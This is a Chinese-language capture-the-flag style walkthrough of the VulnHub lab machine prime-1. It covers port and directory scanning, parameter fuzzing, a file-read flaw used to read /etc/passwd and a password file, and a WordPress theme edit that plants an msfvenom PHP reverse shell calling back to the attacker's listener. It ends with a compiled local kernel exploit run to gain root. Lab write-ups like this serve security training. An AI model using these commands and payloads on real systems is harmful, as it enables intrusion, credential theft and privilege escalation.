kali渗透综合靶机– prime-1

渗透测试靶机 prime-1

下载镜像:https://www.vulnhub.com/entry/prime-1,358/

从VMware打开虚拟机,prime-1如下图

图片[1]-kali渗透综合靶机– prime-1-安全小天地

网络适配器为NAT模式,可以直接点击右上角的图标,获取ip地址信息,也可以使用nmap进行扫描

nmap -sP 192.168.60.1/24

(P:ping 、24:c类地址)

图片[2]-kali渗透综合靶机– prime-1-安全小天地

经过mac地址确定,该靶机的ip为192.168.60.131

扫描端口

找到对应的服务信息

nmap -p 1-65535 -A 192.168.60.131
图片[3]-kali渗透综合靶机– prime-1-安全小天地

可以知道只有22(ssh),80(http)端口开放

知道了ip,可以尝试进行访问,发现如下页面

可以从此页面收集一些有关信息,如页面源代码、扫描目录、cms指纹信息、版本信息等

dirb扫描

(man dirb了解扫描的参数方法)common.txt字典还不错,可以下载到本地windows,(可以copy粘贴到桌面,也可以使用sz file 文件名)

dirb http://192.168.60.131
图片[4]-kali渗透综合靶机– prime-1-安全小天地

可以发现有两个链接比较敏感,一个是/dev,一个是博客系统

http://192.168.60.131/dev
http://192.168.60.131/wordpress/

尝试访问/dev文件,也可以curl 192.168.60.131/dev

图片[5]-kali渗透综合靶机– prime-1-安全小天地

这就是提示咱们需要加点参数,我们可以扫描指定文件后缀,.php,.txt,.zip and so on;

dirb http://192.168.60.131 -X .php,.txt,.zip

可以发现我们扫出3个链接,我们依次访问

图片[6]-kali渗透综合靶机– prime-1-安全小天地

打开http://192.168.60.131/secret.txt,有提示需要我们使用fuzz工具扫描目录,我们来扫一下目录

图片[7]-kali渗透综合靶机– prime-1-安全小天地

fuzz模糊测试

测试一下php文件参数

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt http://192.168.60.131/index.php?FUZZ

找不一样的返回值,为正确值

过滤words单词数为12的,–hw 12 (wfuzz -h )

wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt --hw 12 http://192.168.60.131/index.php?FUZZ
图片[8]-kali渗透综合靶机– prime-1-安全小天地

知道参数为:index.php?file , 思考:是否存在文件读取漏洞?

图片[9]-kali渗透综合靶机– prime-1-安全小天地

根据前面得到的location.txt ,尝试访问:http://192.168.60.131/index.php?file=location.txt

图片[10]-kali渗透综合靶机– prime-1-安全小天地

获得正确参数secrettier360,访问:http://192.168.60.131/image.php?secrettier360

尝试读取敏感文件信息,如:/etc/passwd, http://192.168.60.131/image.php?secrettier360=/etc/passwd

发现提示信息,password.txt 在/home/saket目录下

图片[11]-kali渗透综合靶机– prime-1-安全小天地

利用文件读取,获取密码信息

图片[12]-kali渗透综合靶机– prime-1-安全小天地

尝试登录22号端口ssh服务,ssh -p 22 victor@192.168.60.131, 发现密码不对

图片[13]-kali渗透综合靶机– prime-1-安全小天地

接着,往80端口的http服务wordpress方向进行

可以使用cmseek 扫描版本,也可以使用wpscan

wpscan --url http://192.168.60.131/wordpress/ --enumerate u

获取到用户名为victor,当然wordpress页面也有,登录WordPress,用户名:victor ,密码:follow_the_ippsec

wordpress默认登录页面为:http://102.168.60.131/wordpress/wp-login.php

看能否找到可以写入php代码的地方,上传一句话木马

找到了,但是出于考虑这里用反弹shell的方式(因为不知道靶机的环境,如内网、防火墙、动态ip、杀毒软件)

图片[14]-kali渗透综合靶机– prime-1-安全小天地

php反弹shell

可以找一些php反弹shell的代码,也可以用msf生成反弹shell的payload

msfvenom -p php/meterpreter/reverse_tcp lhost=192.168.60.128 lport=7777 -o shell.php
图片[15]-kali渗透综合靶机– prime-1-安全小天地

将shell.php的代码复制过来,Update File

图片[16]-kali渗透综合靶机– prime-1-安全小天地

启动控制台,msfconsole 可以换每次启动的图形(( •̀ ω •́ )✧)

1.启动监听模块:use exploit/multi/handler

2.输入php类型反弹连接:set payload php/meterpreter/reverse_tcp //和前面一致

3.指定监听的主机和端口:set lhost 192.168.60.128 --> set lport 7777

4.开始监听:exploit/run

图片[17]-kali渗透综合靶机– prime-1-安全小天地

下发指令,找到写入代码的secret.php

访问这一文件:/wordpress/wp-content/themes/twentynineteen/secret.php

发现反弹成功

图片[18]-kali渗透综合靶机– prime-1-安全小天地

利用版本相对应的漏洞

现在可以通过执行一些命令,获取版本信息,然后利用版本相对应的漏洞

getuidsysinfo

Linux ubuntu 4.15.0-142-generic #146~16.04.1-Ubuntu

打开msfconsole,搜索系统版本漏洞,searchsploit 16.04 Ubuntu

如果版本是4.10 的话,则可以使用下面的方法

图片[19]-kali渗透综合靶机– prime-1-安全小天地

将脚本文件复制到root目录下,

cp /usr/share/exploitdb/exploits/linux/local/45010.c ./

编译,

gcc 45010.c -o 45010

在meterpreter窗口,

cd /tmp
upload /root/45010 /tmp/45010
图片[20]-kali渗透综合靶机– prime-1-安全小天地

shell //进入shell窗口

chmod +x 45010 //添加可执行权限

./45010 //执行

图片[21]-kali渗透综合靶机– prime-1-安全小天地

接下来就是,进入root目录,获取密码

图片[22]-kali渗透综合靶机– prime-1-安全小天地
------本文已结束,感谢您的阅读------
THE END
喜欢就支持一下吧
点赞5 分享
评论 抢沙发

请登录后发表评论

    暂无评论内容